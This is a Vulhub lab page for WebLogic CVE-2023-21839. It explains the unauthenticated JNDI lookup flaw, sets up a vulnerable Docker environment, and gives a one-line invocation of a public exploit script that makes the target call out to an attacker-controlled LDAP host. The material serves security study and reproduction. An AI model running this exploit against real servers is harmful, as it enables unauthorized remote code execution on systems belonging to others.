aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/weblogic/CVE-2023-21839
History
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00
..
1.png
first commit
2025-09-06 16:08:15 +08:00
docker-compose.yml
first commit
2025-09-06 16:08:15 +08:00
README.md
first commit
2025-09-06 16:08:15 +08:00
README.zh-cn.md
first commit
2025-09-06 16:08:15 +08:00

README.md

WebLogic Pre-Auth Remote Command Execution (CVE-2023-21839)

中文版本(Chinese version)

Oracle WebLogic Server is a leading Java EE application server widely used in enterprise environments.

In the Oracle Critical Patch Update Advisory - January 2023, Oracle fixed a critical vulnerability (CVE-2023-21839) affecting WebLogic Server versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0.

CVE-2023-21839 allows unauthenticated remote attackers to perform JNDI lookup operations via the T3 or IIOP protocol without authorization. If the JDK version is too low or there are available deserialization gadgets (javaSerializedData) on the server, this can lead to remote code execution.

References:

Environment Setup

Start a Weblogic server 12.2.1.3 by executing the following command:

docker compose up -d

After the server starts, visit http://your-ip:7001/console to access the WebLogic admin console login page.

Vulnerability Reproduction

You can use the public exploit from https://github.com/houqe/POC_CVE-2023-21839 to reproduce the vulnerability.

python CVE-2023-21839.py -ip 192.168.25.129 -p 7001 -l ldap://craft.ldap.tld/test

If the exploit is successful, you will see DNS queries or LDAP requests from the target server, as shown below: